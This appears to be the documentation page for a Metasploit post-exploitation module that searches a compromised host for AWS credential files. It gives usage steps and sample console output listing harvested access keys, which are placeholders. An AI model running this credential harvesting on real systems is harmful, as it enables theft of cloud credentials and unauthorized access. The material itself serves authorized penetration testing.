2.5 KiB
2.5 KiB
Vulnerable Application
Any system with a shell
or meterpreter
session.
Verification Steps
- Get a
shell
ormeterpreter
session on some host. - Do:
use post/multi/gather/aws_keys
- Do:
set SESSION [SESSION_ID]
, replacing[SESSION_ID]
with the session number you wish to run this one. - Do:
run
- If the system has readable configuration files containing AWS key material, they will be printed out.
Options
None.
Scenarios
msf post(aws_keys) > run
[*] Enumerating possible user AWS config files
[*] Looking for AWS config/credentials files in /bin
[*] Looking for AWS config/credentials files in /dev
[*] Looking for AWS config/credentials files in /home/syslog
[*] Looking for AWS config/credentials files in /home/test
[*] Looking for AWS config/credentials files in /home/test ubuntu
[*] Looking for AWS config/credentials files in /home/ubuntu
[*] Looking for AWS config/credentials files in /nonexistent
[*] Looking for AWS config/credentials files in /root
[*] Looking for AWS config/credentials files in /usr/games
[*] Looking for AWS config/credentials files in /usr/sbin
[*] Looking for AWS config/credentials files in /var/backups
[*] Looking for AWS config/credentials files in /var/cache/man
[*] Looking for AWS config/credentials files in /var/cache/pollinate
[*] Looking for AWS config/credentials files in /var/lib/gnats
[*] Looking for AWS config/credentials files in /var/lib/landscape
[*] Looking for AWS config/credentials files in /var/lib/libuuid
[*] Looking for AWS config/credentials files in /var/list
[*] Looking for AWS config/credentials files in /var/mail
[*] Looking for AWS config/credentials files in /var/run/dbus
[*] Looking for AWS config/credentials files in /var/run/ircd
[*] Looking for AWS config/credentials files in /var/run/sshd
[*] Looking for AWS config/credentials files in /var/spool/lpd
[*] Looking for AWS config/credentials files in /var/spool/news
[*] Looking for AWS config/credentials files in /var/spool/uucp
[*] Looking for AWS config/credentials files in /var/www
AWS Key Data
============
Source AWS_ACCESS_KEY_ID AWS_SECRET_ACCESS_KEY Profile
------ ----------------- --------------------- -------
/home/test/.aws/credentials BAR PRIVATE_TEST test
/home/ubuntu/.aws/credentials ABC456 PRIVATE_TEST test
/root/.s3cfg root_key root_secret default